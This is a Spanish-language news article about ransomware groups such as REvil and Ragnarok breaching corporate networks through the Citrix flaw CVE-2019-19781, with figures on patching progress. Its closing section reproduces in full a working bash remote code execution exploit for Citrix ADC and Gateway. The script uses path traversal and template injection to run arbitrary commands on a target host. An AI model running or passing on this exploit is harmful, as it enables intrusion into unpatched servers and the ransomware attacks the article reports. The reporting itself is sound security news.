Hackers atacan Citrix sin parchar para implementar ransomware

Las empresas que aún ejecuten servidores Citrix sin parches corren el riesgo de que sus redes se infecten con ransomware.

Múltiples fuentes en la comunidad infosec informan sobre grupos de hackers que utilizan la vulnerabilidad CVE-2019-19781 en dispositivos Citrix para violar las redes corporativas y luego instalar ransomware.
Infecciones REvil confirmadas

Investigadores de seguridad de FireEye y Under the Breach han confirmado las infecciones de ransomware que se remontan a servidores Citrix pirateados.

El grupo de ransomware REvil (Sodinokibi) ha sido identificada como uno de los grupos que atacan los servidores Citrix para establecerse en las redes corporativas y luego instalar su cepa de ransomware personalizada.

«Examiné los archivos que REvil publicó en línea desde Gedia.com después de que la compañía se negó a pagar la demanda de rescate», dijeron hoy investigadores de seguridad de Under the Breach.

«Lo interesante que descubrí es que obviamente piratearon Gedia a través del exploit de Citrix».

Los rumores no confirmados también afirman que el grupo delictivo de ransomware Maze también está apuntando a servidores Citrix, similar a como lo hizó REvil.

Sin embargo, atacar servidores corporativos encaja perfectamente con el modus operandi del grupo REvil. Anteriormente, esta misma organización también ha estado explotando vulnerabilidades en Pulse Secure VPN para ingresar a las redes corporativas e instalar su ransomware.

FireEye también publicó que tercer grupo que usa el error Citrix para infectar a PCs y servidores, pero con el ransomware Ragnarok.

Todos estos ataques tienen lugar después de que los piratas informáticos buscaran en Internet dispositivos Citrix que no hayan sido protegidos contra la vulnerabilidad CVE-2019-19781.

Los dispositivos vulnerables incluyen Citrix Application Delivery Controller (ADC), Citrix Gateway y dos versiones anteriores de Citrix SD-WAN WANOP.

La vulnerabilidad fue revelada a mediados de diciembre; sin embargo, los ataques en todo el Internet comenzaron después del 11 de enero, cuando el código del Exploit se publicó en internet y estuvo ampliamente disponible para cualquiera persona.

Inicialmente, los parches no estaban disponibles para la vulnerabilidad CVE-2019-19781. En cambio, Citrix recomendó una serie de mitigaciones que los administradores de servidores podrían aplicar y proteger sus dispositivos.

Esas mitigaciones no siempre funcionaron, o muchas compañías no las aplicaron. Con la amplia disponibilidad de código de exploit, los ataques a los servidores Citrix se han incrementado exponencialmente en las últimas semanas.

La buena noticia es que hoy, Citrix terminó de publicar parches para todas las versiones vulnerables, lo que significa que las empresas pueden aplicar una solución permanente a sus servidores actualizando a la versión más reciente del firmware de Citrix.

Actualmente, el proceso de parchado parece estar yendo bien. En diciembre, el número de sistemas vulnerables se estimó en 80,000 servidores, un número que se redujo a aproximadamente 25,000 a mediados de enero, y despues bajo a 11,000 sistemas, a partir de ayer.

A principios de esta semana, Citrix y FireEye también han colaborado para crear una herramienta que los administradores de servidores Citrix puedan ejecutar y ver si sus dispositivos han sido pirateados con el exploit CVE-2019-19781, antes de aplicar un parche.

Si la amenaza de infectarse con ransomware no es suficiente para asustar a algunas empresas al aplicar los parches de Citrix para CVE-2019-19781, entonces las empresas también deben tener en cuenta que algunos delincuentes están secuestrando servidores Citrix y vendiendo acceso a sus redes en foros de piratería.

Aqui parte del Código

#!/bin/bash
# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781
# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'
# Release Date : 11/01/2020
# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
echo "=================================================================================
 ___             _           _     ____                 ___           _  _
| _ \ _ _  ___  (_) ___  __ | |_  |_  / ___  _ _  ___  |_ _| _ _   __| |(_) __ _
|  _/| '_|/ _ \ | |/ -_)/ _||  _|  / / / -_)| '_|/ _ \  | | | ' \ / _' || |/ _' |
|_|  |_|  \___/_/ |\___|\__| \__| /___|\___||_|  \___/ |___||_||_|\__,_||_|\__,_|
              |__/                                                 CVE-2019-19781
================================================================================="
##############################
if [ -z "$1" ];
then
echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n'
exit;
fi
export LC_CTYPE=C
filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is
echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
echo -ne "Command Output :\n"
curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is